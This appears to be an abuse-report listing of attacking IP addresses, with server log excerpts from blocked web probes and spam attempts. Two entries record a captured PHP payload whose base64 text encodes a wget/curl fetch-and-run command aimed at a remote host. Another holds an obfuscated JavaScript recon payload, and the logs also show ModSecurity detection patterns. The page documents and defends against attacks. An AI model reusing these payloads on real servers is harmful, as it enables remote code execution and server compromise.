|
π©πͺ
151.243.150.222
|
|
[Wed Jul 15 17:11:26.318078 2026] [core:info] [pid 122708:tid 122778] [client 151.243.150.222:24620] ...
show more
[Wed Jul 15 17:11:26.318078 2026] [core:info] [pid 122708:tid 122778] [client 151.243.150.222:24620] AH00128: File does not exist: /home/harald/www/default_host/config/database.php
...
show less
|
Bad Web Bot
|
|
πΊπΈ
44.195.38.78
|
|
[Wed Jul 15 17:05:45.129122 2026] [security2:error] [pid 122567:tid 122683] [client 44.195.38.78:433 ...
show more
[Wed Jul 15 17:05:45.129122 2026] [security2:error] [pid 122567:tid 122683] [client 44.195.38.78:43360] [client 44.195.38.78] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1056"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/6.5.10"] [hostname "maillist.weave
...
show less
|
Web App Attack
|
|
πΈπ¬
104.28.163.27
|
|
[Wed Jul 15 15:51:42.685747 2026] [security2:error] [pid 104110:tid 104230] [client 104.28.163.27:14 ...
show more
[Wed Jul 15 15:51:42.685747 2026] [security2:error] [pid 104110:tid 104230] [client 104.28.163.27:14299] [client 104.28.163.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "Search Engine" at TX:httpbl_msg. [file "/usr/share/modsecurity-crs/rules/REQUEST-910-IP-REPUTATION.conf"] [line "199"] [id "910150"] [msg "HTTP Blacklist match for search engine IP"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-ip"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [hostname "weavernet.at"] [uri "/tracker/announce"] [unique_id "aleQbpCZydJ5mnn4CNJwJwAAAOY"]
[Wed Jul 15 16:02:00.512562 2026] [security2:error] [pid 122296:tid 122376] [client 104.28.163.27:13569] [client 104.28.163.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "Search Engine" at TX:httpbl_msg. [file "/usr/share/modsecurity-crs/rules/REQUEST-910-IP-REPUTATION.conf"] [line "199"] [id "910150"] [msg "HTTP
...
show less
|
Web App Attack
|
|
πΊπΈ
52.90.219.237
|
|
[Wed Jul 15 16:48:51.285622 2026] [security2:error] [pid 122655:tid 122730] [client 52.90.219.237:41 ...
show more
[Wed Jul 15 16:48:51.285622 2026] [security2:error] [pid 122655:tid 122730] [client 52.90.219.237:41864] [client 52.90.219.237] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1056"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/6.5.10"] [hostname "aschi.at"] [uri
...
show less
|
Web App Attack
|
|
π»π³
180.93.255.222
|
|
[Wed Jul 15 16:41:26.017910 2026] [core:info] [pid 121977:tid 122127] [client 180.93.255.222:59975] ...
show more
[Wed Jul 15 16:41:26.017910 2026] [core:info] [pid 121977:tid 122127] [client 180.93.255.222:59975] AH00128: File does not exist: /home/harald/www/default_host/blog/wp-includes/wlwmanifest.xml
...
show less
|
Bad Web Bot
|
|
π¨π
107.189.10.124
|
|
[Wed Jul 15 16:07:54.220613 2026] [security2:error] [pid 122567:tid 122670] [client 107.189.10.124:3 ...
show more
[Wed Jul 15 16:07:54.220613 2026] [security2:error] [pid 122567:tid 122670] [client 107.189.10.124:37490] [client 107.189.10.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:m[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*q[\\"\\\\^]*l(?:[\\"\\\\^]*(?:d[\\"\\\\^]*u[\\"\\\\^]*m[\\"\\\\^]*p(?:[\\"\\\\^]*s[\\"\\\\^ ..." at ARGS:<?php shell_exec(base64_decode("KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMjE3LjYwLjE5NS4xMTMvc2ggfHwgY3VybCAtc2sgaHR0cHM6Ly8yMTcuNjAuMTk1LjExMy9zaCkgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "256"] [id "932110"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: ; echo found within ARGS:<?php shell_exec(base64
...
show less
|
Web App Attack
|
|
πΊπΈ
35.229.122.133
|
|
[Wed Jul 15 15:40:09.559121 2026] [core:info] [pid 104497:tid 104579] [client 35.229.122.133:54191] ...
show more
[Wed Jul 15 15:40:09.559121 2026] [core:info] [pid 104497:tid 104579] [client 35.229.122.133:54191] AH00128: File does not exist: /home/harald/www/DomainBLDB/blog/wp-includes/wlwmanifest.xml
...
show less
|
Bad Web Bot
|
|
πΊπΈ
34.75.86.230
|
|
[Wed Jul 15 15:34:12.293104 2026] [core:info] [pid 104110:tid 104228] [client 34.75.86.230:61629] AH ...
show more
[Wed Jul 15 15:34:12.293104 2026] [core:info] [pid 104110:tid 104228] [client 34.75.86.230:61629] AH00128: File does not exist: /home/divisio/www/blog/wp-includes/wlwmanifest.xml
...
show less
|
Bad Web Bot
|
|
π§π·
45.160.153.213
|
|
[Wed Jul 15 15:29:53.066175 2026] [authz_core:error] [pid 104736:tid 104834] [client 45.160.153.213: ...
show more
[Wed Jul 15 15:29:53.066175 2026] [authz_core:error] [pid 104736:tid 104834] [client 45.160.153.213:41906] AH01630: client denied by server configuration: /home/harald/www/aschi.at/xmlrpc.php
...
show less
|
Bad Web Bot
|
|
πΊπΈ
3.135.183.46
|
|
[Wed Jul 15 15:25:23.134373 2026] [security2:error] [pid 104627:tid 104743] [client 3.135.183.46:363 ...
show more
[Wed Jul 15 15:25:23.134373 2026] [security2:error] [pid 104627:tid 104743] [client 3.135.183.46:36370] [client 3.135.183.46] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "stne.weavernet.at"] [uri "/.git/config"] [unique_id "aleKQ-30FcfZdgpY0_oUtQAAA48"]
[Wed Jul 15 15:25:23.422274 2026] [security2:error] [pid 104627:tid 104753] [client 3.135.183.46:36370] [client 3.135.183.46] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "/.env" at REQUEST_FILENAME. [file "/us
...
show less
|
Web App Attack
|
|
πΊπΈ
34.148.80.231
|
|
[Wed Jul 15 15:14:32.121630 2026] [core:info] [pid 103997:tid 104026] [client 34.148.80.231:60703] A ...
show more
[Wed Jul 15 15:14:32.121630 2026] [core:info] [pid 103997:tid 104026] [client 34.148.80.231:60703] AH00128: File does not exist: /home/harald/www/DownloadHost/blog/wp-includes/wlwmanifest.xml
...
show less
|
Bad Web Bot
|
|
π³π±
82.39.206.155
|
|
[Wed Jul 15 14:57:37.422445 2026] [security2:error] [pid 104736:tid 104843] [client 82.39.206.155:39 ...
show more
[Wed Jul 15 14:57:37.422445 2026] [security2:error] [pid 104736:tid 104843] [client 82.39.206.155:39788] [client 82.39.206.155] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "stne.weavernet.at"] [uri "/.git/HEAD"] [unique_id "aleDwWqxgigRxN0V_W3FzwAAA-w"]
[Wed Jul 15 14:57:41.521647 2026] [security2:error] [pid 104668:tid 104809] [client 82.39.206.155:53926] [client 82.39.206.155] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "/.env" at REQUEST_FILENAME. [file "/us
...
show less
|
Web App Attack
|
|
π°π·
175.209.156.146
|
|
[Wed Jul 15 14:53:44.294779 2026] [security2:error] [pid 104736:tid 104837] [client 175.209.156.146: ...
show more
[Wed Jul 15 14:53:44.294779 2026] [security2:error] [pid 104736:tid 104837] [client 175.209.156.146:54504] [client 175.209.156.146] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "elearning.weavernet.at"] [uri "/.env"] [unique_id "aleC2GqxgigRxN0V_W3FvgAAA-Y"]
[Wed Jul 15 14:53:44.315681 2026] [security2:error] [pid 104497:tid 104581] [client 175.209.156.146:54514] [client 175.209.156.146] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "/.env" at REQUEST_FILENAME. [file "/u
...
show less
|
Web App Attack
|
|
π³π±
172.94.9.136
|
|
Jul 15 14:35:32 odin postfix/smtpd[110486]: NOQUEUE: reject: RCPT from unknown[172.94.9.136]: 554 5. ...
show more
Jul 15 14:35:32 odin postfix/smtpd[110486]: NOQUEUE: reject: RCPT from unknown[172.94.9.136]: 554 5.7.1 Service unavailable; Client host [172.94.9.136] blocked using allinone.bl.blocklist.de; Infected System (Service: sasl, Last-Attack: 1784012281), see http://www.blocklist.de/en/view.html?ip=172.94.9.136; from=<[email protected]> to=<[email protected]> proto=ESMTP helo=<svr>
Jul 15 14:35:33 odin postfix/smtpd[110483]: NOQUEUE: reject: RCPT from unknown[172.94.9.136]: 554 5.7.1 Service unavailable; Client host [172.94.9.136] blocked using allinone.bl.blocklist.de; Infected System (Service: sasl, Last-Attack: 1784012281), see http://www.blocklist.de/en/view.html?ip=172.94.9.136; from=<[email protected]> to=<[email protected]> proto=ESMTP helo=<svr>
Jul 15 14:35:33 odin postfix/smtpd[109755]: NOQUEUE: reject: RCPT from unknown[172.94.9.136]: 554 5.7.1 Service unavailable; Client host [172.94.9.136] blocked using allinone.bl.blocklist.de; Infected S
...
show less
|
Email Spam
|
|
πΊπΈ
35.196.172.32
|
|
[Wed Jul 15 14:12:08.308881 2026] [core:info] [pid 104736:tid 104819] [client 35.196.172.32:64091] A ...
show more
[Wed Jul 15 14:12:08.308881 2026] [core:info] [pid 104736:tid 104819] [client 35.196.172.32:64091] AH00128: File does not exist: /home/sabine/www/blog/wp-includes/wlwmanifest.xml
...
show less
|
Bad Web Bot
|
|
πΊπΈ
35.185.24.234
|
|
[Wed Jul 15 14:09:44.237256 2026] [core:info] [pid 104149:tid 104241] [client 35.185.24.234:59152] A ...
show more
[Wed Jul 15 14:09:44.237256 2026] [core:info] [pid 104149:tid 104241] [client 35.185.24.234:59152] AH00128: File does not exist: /home/harald/www/matomo/blog/wp-includes/wlwmanifest.xml
...
show less
|
Bad Web Bot
|
|
π΅π°
139.135.45.70
|
|
[Wed Jul 15 14:05:21.349199 2026] [authz_core:error] [pid 104627:tid 104741] [client 139.135.45.70:4 ...
show more
[Wed Jul 15 14:05:21.349199 2026] [authz_core:error] [pid 104627:tid 104741] [client 139.135.45.70:40304] AH01630: client denied by server configuration: /home/harald/www/aschi.at/xmlrpc.php
...
show less
|
Bad Web Bot
|
|
πΊπΈ
136.113.9.105
|
|
[Wed Jul 15 14:02:18.402581 2026] [security2:error] [pid 104052:tid 104112] [client 136.113.9.105:32 ...
show more
[Wed Jul 15 14:02:18.402581 2026] [security2:error] [pid 104052:tid 104112] [client 136.113.9.105:32194] [client 136.113.9.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:(?:\\\\(|\\\\[)[a-zA-Z0-9_.$\\"'\\\\[\\\\](){}/*\\\\s]+(?:\\\\)|\\\\])[0-9_.$\\"'\\\\[\\\\](){}/*\\\\s]*\\\\([a-zA-Z0-9_.$\\"'\\\\[\\\\](){}/*\\\\s].*\\\\)|\\\\([\\\\s]*string[\\\\s]*\\\\)[\\\\s]*(?:\\"|'))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "503"] [id "933210"] [msg "PHP Injection Attack: Variable Function Call Found"] [data "Matched Data: (global[String['from' 'CharCode'](66,117,102,102,101,114)].from('KGFzeW5jIGZ1bmN0aW9uKCl7Ci8vIGZhc3RfcmVjb25fdjYg4oCUIHNpZ25hdHVyZS1yb3RhdGVkIHJlY29uIHBheWxvYWQKLy8gQ2hhbmdlcyBmcm9tIHY1OgovLyAgIC0gUmFuZG9taXplZCB0b3AtbGV2ZWwgSlNPTiBrZXlzIChubyBmaXhlZCBzY2hlbWEgdG8gZmluZ2VycHJpbnQpCi8vICAgLSBWYXJpYWJsZSBvdXRwdXQgc3RydWN0dXJlIHBlciBpbnZvY2F0aW9uCi8vICAgLSBJTURTIGNhbGxzIHVzZSByYW5kb21pemVkIFVzZ
...
show less
|
Web App Attack
|
|
πΈπ¬
101.47.8.187
|
|
[Wed Jul 15 12:23:17.484347 2026] [security2:error] [pid 86939:tid 87034] [client 101.47.8.187:45148 ...
show more
[Wed Jul 15 12:23:17.484347 2026] [security2:error] [pid 86939:tid 87034] [client 101.47.8.187:45148] [client 101.47.8.187] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:m[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*q[\\"\\\\^]*l(?:[\\"\\\\^]*(?:d[\\"\\\\^]*u[\\"\\\\^]*m[\\"\\\\^]*p(?:[\\"\\\\^]*s[\\"\\\\^ ..." at ARGS:<?php shell_exec(base64_decode("KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMjE3LjYwLjE5NS4xMTMvc2ggfHwgY3VybCAtc2sgaHR0cHM6Ly8yMTcuNjAuMTk1LjExMy9zaCkgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "256"] [id "932110"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: ; echo found within ARGS:<?php shell_exec(base64_decod
...
show less
|
Web App Attack
|
|
π±πΉ
62.60.130.230
|
|
[Wed Jul 15 12:11:59.693112 2026] [core:info] [pid 86720:tid 86823] [client 62.60.130.230:50840] AH0 ...
show more
[Wed Jul 15 12:11:59.693112 2026] [core:info] [pid 86720:tid 86823] [client 62.60.130.230:50840] AH00128: File does not exist: /home/divisio/www/administrator/components/com_jce/, referer: www.google.com
...
show less
|
Bad Web Bot
|
|
πΊπΈ
35.185.57.94
|
|
[Wed Jul 15 09:49:33.492878 2026] [core:info] [pid 49694:tid 49804] [client 35.185.57.94:53926] AH00 ...
show more
[Wed Jul 15 09:49:33.492878 2026] [core:info] [pid 49694:tid 49804] [client 35.185.57.94:53926] AH00128: File does not exist: /home/harald/www/matomo/blog/wp-includes/wlwmanifest.xml
...
show less
|
Bad Web Bot
|
|
π³π±
45.148.10.244
|
|
[Wed Jul 15 09:47:00.404402 2026] [security2:error] [pid 49632:tid 49733] [remote 45.148.10.244:3192 ...
show more
[Wed Jul 15 09:47:00.404402 2026] [security2:error] [pid 49632:tid 49733] [remote 45.148.10.244:31924] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "bienchen.at"] [uri "/.git/config"] [unique_id "alc69BUCKW22QZW3FyBFgQACgRc"]
[Wed Jul 15 09:47:00.531194 2026] [security2:error] [pid 49632:tid 49709] [remote 45.148.10.244:31924] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/shar
...
show less
|
Web App Attack
|
|
πΊπΈ
209.85.160.71
|
|
Manually detected Spam
|
Email Spam
|
|
π³π±
185.145.13.60
|
|
Manually detected Spam
|
Email Spam
|
|
πΊπΈ
158.247.31.15
|
|
Manually detected Spam
|
Email Spam
|